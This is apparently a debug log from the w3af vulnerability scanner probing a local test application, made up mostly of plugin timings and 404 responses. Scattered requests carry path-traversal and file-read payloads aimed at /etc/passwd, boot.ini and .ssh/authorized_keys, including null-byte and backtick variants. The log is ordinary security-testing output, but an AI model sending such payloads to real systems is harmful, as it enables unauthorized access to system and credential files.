strange_headers.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] ssn.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] oracle.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] feeds.grep(uri="http://localhost:9090/72/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=24239,from_cache=0,grep=0,rtt=0.21,did=EPR069JK) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/perl/files.pl returned HTTP code "404" (id=24240,from_cache=0,grep=1,rtt=0.01,did=Pm80bUqY) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/filemgmt/singlefile.php returned HTTP code "404" (id=24245,from_cache=0,grep=1,rtt=0.06,did=SuF1qw1r) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/viewlogs.pl returned HTTP code "404" (id=24242,from_cache=0,grep=1,rtt=0.02,did=X40BzEPm) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/logs/error_log returned HTTP code "404" (id=24244,from_cache=0,grep=1,rtt=0.02,did=jABLe5Qx) [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2365. [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4525. [Wed Feb 12 10:04:34 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/72/") took 0.10s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/advworks/equipment/catalog_type.asp returned HTTP code "404" (id=24246,from_cache=0,grep=1,rtt=0.08,did=bcTqNQVx) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/secure/ returned HTTP code "404" (id=24247,from_cache=0,grep=1,rtt=0.09,did=4gB0qLyC) [Wed Feb 12 10:04:34 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: EPR069JK) [Wed Feb 12 10:04:34 2020 - debug] detailed._login() took 1.47s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/jj returned HTTP code "404" (id=24241,from_cache=0,grep=1,rtt=0.11,did=6eBX7GAK) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=/etc/passwd\x00&page=1 returned HTTP code "404" (id=24243,from_cache=0,grep=1,rtt=0.05,did=SHWJGa03) [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=`/etc/passwd` returned HTTP code "404" (id=24248,from_cache=0,grep=1,rtt=0.06,did=BHibVxv2) [Wed Feb 12 10:04:34 2020 - debug] localhost:9090 connection pool stats (free:258 / in_use:2 / max:50 / total:260) [Wed Feb 12 10:04:34 2020 - debug] Connections with more in use time: (322f9128d5193fb5, 0.09 sec) (c80f716819dd7c2d, 0.06 sec) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/finance.xls returned HTTP code "404" (id=24251,from_cache=0,grep=1,rtt=0.07,did=gjycp4aU) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/ratlog.cgi returned HTTP code "404" (id=24250,from_cache=0,grep=1,rtt=0.13,did=pc7j5I6G) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/cgi-bin/stat/ returned HTTP code "404" (id=24249,from_cache=0,grep=1,rtt=0.12,did=xLl54IfB) [Wed Feb 12 10:04:34 2020 - debug] symfony.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2366. [Wed Feb 12 10:04:34 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2367. [Wed Feb 12 10:04:34 2020 - debug] expect_ct.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] svn_users.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] private_ip.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] motw.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] meta_generator.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] retirejs.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2368. [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2369. [Wed Feb 12 10:04:34 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:34 2020 - debug] serialized_object.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] blank_body.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] credit_cards.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] websockets_links.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] csp.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] dom_xss.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] file_upload.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/04/") took 0.00s to run [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum.asp?n=/etc/passwd\x00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24256,from_cache=0,grep=1,rtt=0.01,did=Duzxrn0a) [Wed Feb 12 10:04:34 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/04/") took 0.07s to run [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/super_stats/access_logs returned HTTP code "404" (id=24252,from_cache=0,grep=1,rtt=0.11,did=9HPbPfGG) [Wed Feb 12 10:04:34 2020 - debug] vulners_db.grep(uri="http://localhost:9090/04/") took 0.07s to run [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=100&page=/.\\"./.\\"./.\\"./.\\"./.\\"./boot.ini returned HTTP code "404" (id=24258,from_cache=0,grep=1,rtt=0.08,did=QsGxJNhJ) [Wed Feb 12 10:04:34 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12631, 'reject-seen-url': 5828, 'reject-out-of-scope': 216, 'accept': 4950} [Wed Feb 12 10:04:34 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2370. [Wed Feb 12 10:04:34 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=c:\\boot.ini returned HTTP code "404" (id=24255,from_cache=0,grep=1,rtt=0.08,did=BygxZbYG) [Wed Feb 12 10:04:34 2020 - debug] HEAD http://localhost:9090/stats/ returned HTTP code "404" (id=24257,from_cache=0,grep=1,rtt=0.05,did=CnLo0qWX) [Wed Feb 12 10:04:34 2020 - debug] Worker with ID AuditorWorker(3lIHqMdP) has been running job 9124 for 27.00 seconds. The job is: _audit(, , , , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(6gcxf74d) has been running job 1057 for 27.14 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(NjMjnrCb) has been running job 1059 for 27.13 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 1042 for 32.84 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(br5sQhGq) has been running job 840 for 298.18 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/archive_dot_org.py:88 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/archive_dot_org.py:161 @ _spider_archive(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 818.44 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:96 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/pykto.py:126 @ _run(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(XyVz5jPE) has been running job 1049 for 32.83 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(ubgDPgOi) has been running job 1055 for 30.73 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(z6MGDQIP) has been running job 661 for 323.41 seconds. The job is: _discover_worker(, , kwargs={}). Function call tree: /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:72 @ __call__(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/base_consumer.py:54 @ _wrapper(), /home/ayush/w3af/w3af/core/controllers/core_helpers/consumers/crawl_infrastructure.py:527 @ _discover_worker(), /home/ayush/w3af/w3af/core/controllers/plugins/crawl_plugin.py:56 @ discover_wrapper(), /home/ayush/w3af/w3af/plugins/crawl/open_api.py:99 @ crawl(), /home/ayush/w3af/w3af/plugins/crawl/open_api.py:396 @ _analyze_current_path(), /home/ayush/w3af/w3af/core/controllers/threads/threadpool.py:491 @ map_multi_args(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:672 @ get(), /home/ayush/w3af/w3af/core/controllers/threads/pool276.py:667 @ wait(), /usr/lib/python2.7/threading.py:340 @ wait() [Wed Feb 12 10:04:35 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 863 for 41.30 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 10:04:35 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 10:04:35 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 10:04:35 2020 - debug] CrawlInfraWorker worker pool has 74 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum-ra.asp?n=/../../../../../../../../../../../boot.ini returned HTTP code "404" (id=24560,from_cache=0,grep=1,rtt=0.09,did=C8i74uFN) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/filemanager/index.php3 returned HTTP code "404" (id=24562,from_cache=0,grep=1,rtt=0.06,did=AsKABklo) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2429. [Wed Feb 12 10:04:35 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/28/") took 0.08s to run [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12921, 'reject-seen-url': 5836, 'reject-out-of-scope': 216, 'accept': 4952} [Wed Feb 12 10:04:35 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: nkhkGhgn) [Wed Feb 12 10:04:35 2020 - debug] detailed._login() took 1.08s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=/../../../etc/passwd&=&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. returned HTTP code "404" (id=24564,from_cache=0,grep=1,rtt=0.15,did=rrmsipRx) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4518. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/buffer1.jsp returned HTTP code "404" (id=24565,from_cache=0,grep=1,rtt=0.09,did=EpIUIgcO) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2430. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2431. [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2432. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/log/ returned HTTP code "404" (id=24566,from_cache=0,grep=1,rtt=0.36,did=Zxysk4Qt) [Wed Feb 12 10:04:35 2020 - debug] localhost:9090 connection pool stats (free:289 / in_use:7 / max:50 / total:296) [Wed Feb 12 10:04:35 2020 - debug] Connections with more in use time: (4f84c4f303cde3e7, 0.15 sec) (d6d46eca7bc23479, 0.10 sec) (65408d67cf8eb4b0, 0.10 sec) (f5a9ab6d540e2963, 0.09 sec) (5398bfa00894de18, 0.05 sec) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/test/jsp/pageExtends.jsp returned HTTP code "404" (id=24569,from_cache=0,grep=1,rtt=0.19,did=dgjIDeJa) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/homebet/homebet.dll?form=menu&=&option=menu-signin returned HTTP code "404" (id=24567,from_cache=0,grep=1,rtt=0.16,did=kYeNUgw9) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/.www_acl returned HTTP code "404" (id=24570,from_cache=0,grep=1,rtt=0.15,did=EIqHUiG3) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24568,from_cache=0,grep=1,rtt=0.17,did=WXZYh2qa) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/cbmc/forums.cgi returned HTTP code "404" (id=24571,from_cache=0,grep=1,rtt=0.06,did=kAOF8EnL) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/simplestguest.cgi returned HTTP code "404" (id=24574,from_cache=0,grep=1,rtt=0.03,did=ig9qXSan) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=/....../boot.ini&page=1 returned HTTP code "404" (id=24575,from_cache=0,grep=1,rtt=0.04,did=U3AiMUXA) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/manage/login.asp returned HTTP code "404" (id=24576,from_cache=0,grep=1,rtt=0.14,did=JC4AtgbF) [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2433. [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/yabbse/Sources/Packages.php returned HTTP code "404" (id=24577,from_cache=0,grep=1,rtt=0.04,did=SEAVrTyM) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/pls/portal30/admin_/ returned HTTP code "404" (id=24573,from_cache=0,grep=1,rtt=0.21,did=sZeBvZJk) [Wed Feb 12 10:04:35 2020 - debug] symfony.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] private_ip.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] motw.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/infos/faq/index.asp returned HTTP code "404" (id=24578,from_cache=0,grep=1,rtt=0.05,did=QD1wGJDt) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/protected/secret.html returned HTTP code "404" (id=24580,from_cache=0,grep=1,rtt=0.12,did=dpxEbl1s) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/modules/Search/index.php returned HTTP code "404" (id=24582,from_cache=0,grep=1,rtt=0.14,did=sRJPz5OA) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/akopia/ returned HTTP code "404" (id=24583,from_cache=0,grep=1,rtt=0.07,did=iO1ec1Hg) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/bb-ack.sh returned HTTP code "404" (id=24584,from_cache=0,grep=1,rtt=0.16,did=aYfDGr2H) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/forum/viewtopic.php returned HTTP code "404" (id=24585,from_cache=0,grep=1,rtt=0.09,did=moOxxMT6) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/DCFORMS98.CGI returned HTTP code "404" (id=24586,from_cache=0,grep=1,rtt=0.02,did=0RtqmVSv) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/ows-bin/oasnetconf.exe?-l -s BlahBlah= returned HTTP code "404" (id=24587,from_cache=0,grep=1,rtt=0.15,did=FKKgscUJ) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/tutos/file/file_select.php returned HTTP code "404" (id=24588,from_cache=0,grep=1,rtt=0.08,did=4h8G1MQr) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found returned HTTP code "404" (id=24589,from_cache=0,grep=1,rtt=0.08,did=A1DCFtfl) [Wed Feb 12 10:04:35 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] meta_generator.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] retirejs.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:35 2020 - debug] serialized_object.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] blank_body.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] credit_cards.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] websockets_links.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] csp.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] dom_xss.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] keys.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2434. [Wed Feb 12 10:04:35 2020 - debug] clamav.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] svn_users.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1_professionnel.asp?n=1771&=&=&nn=100&page=/.../.../.../.../.../.../boot.ini returned HTTP code "404" (id=24572,from_cache=0,grep=1,rtt=0.11,did=VGZohHnI) [Wed Feb 12 10:04:35 2020 - debug] file_upload.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] expect_ct.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/modif_infos.asp?n=../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=24581,from_cache=0,grep=1,rtt=0.07,did=SyUs8uPS) [Wed Feb 12 10:04:35 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] objects.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] error_500.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] meta_tags.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] password_profiling.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] click_jacking.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] lang.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/demo/sql/index.jsp returned HTTP code "404" (id=24579,from_cache=0,grep=1,rtt=0.17,did=rS9DHWfR) [Wed Feb 12 10:04:35 2020 - debug] vulners_db.grep(uri="http://localhost:9090/h/") took 0.08s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4518. [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/cgi-bin/magiccard.cgi?pa=3Dpreview&=&=&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd returned HTTP code "404" (id=24590,from_cache=0,grep=1,rtt=0.10,did=ypkr4rIa) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum1.asp?n=1753&=&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini returned HTTP code "404" (id=24591,from_cache=0,grep=1,rtt=0.10,did=R0HFm8z8) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/pks/lookup returned HTTP code "404" (id=24594,from_cache=0,grep=1,rtt=0.08,did=mdmjfkC1) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_arc.asp?n=../../../../../../../../../etc/passwd\x00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24592,from_cache=0,grep=1,rtt=0.16,did=JKaJU4BI) [Wed Feb 12 10:04:35 2020 - debug] url_session.grep(uri="http://localhost:9090/h/") took 0.12s to run [Wed Feb 12 10:04:35 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/screen.php returned HTTP code "404" (id=24595,from_cache=0,grep=1,rtt=0.08,did=2aqsugcj) [Wed Feb 12 10:04:35 2020 - debug] strange_reason.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] cache_control.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] strange_headers.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] ssn.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] oracle.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] feeds.grep(uri="http://localhost:9090/h/") took 0.00s to run [Wed Feb 12 10:04:35 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2435. [Wed Feb 12 10:04:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12943, 'reject-seen-url': 5837, 'reject-out-of-scope': 216, 'accept': 4954} [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/shop/show.php returned HTTP code "404" (id=24597,from_cache=0,grep=1,rtt=0.06,did=eCSgtSwm) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/sw000.asp?|-|0|404_Object_Not_Found= returned HTTP code "404" (id=24593,from_cache=0,grep=1,rtt=0.03,did=fiBlpVPJ) [Wed Feb 12 10:04:35 2020 - debug] GET http://localhost:9090/forum_arc.asp?n=c:\\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_ returned HTTP code "404" (id=24598,from_cache=0,grep=1,rtt=0.26,did=mxvKV5JN) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/bin/CGImail.exe returned HTTP code "404" (id=24599,from_cache=0,grep=1,rtt=0.17,did=lWeQJy91) [Wed Feb 12 10:04:35 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/h/") took 0.11s to run [Wed Feb 12 10:04:35 2020 - debug] error_pages.grep(uri="http://localhost:9090/h/") took 0.18s to run [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/fpremadm.exe returned HTTP code "404" (id=24596,from_cache=0,grep=1,rtt=0.06,did=xJeXxFbl) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/cgi-bin/pollssi.cgi returned HTTP code "404" (id=24603,from_cache=0,grep=1,rtt=0.15,did=FHPwBYNI) [Wed Feb 12 10:04:35 2020 - debug] localhost:9090 connection pool stats (free:299 / in_use:3 / max:50 / total:302) [Wed Feb 12 10:04:35 2020 - debug] Connections with more in use time: (51b29e0d1b5e5e22, 0.03 sec) (12ae5406b13703de, 0.03 sec) (cf4829bf123127da, 0.02 sec) [Wed Feb 12 10:04:35 2020 - debug] HEAD http://localhost:9090/.ssh/authorized_keys returned HTTP code "404" (id=24601,from_cache=0,grep=1,rtt=0.19,did=zg0RBJ10) [Wed Feb 12 10:04:35 2020 - debug] GET 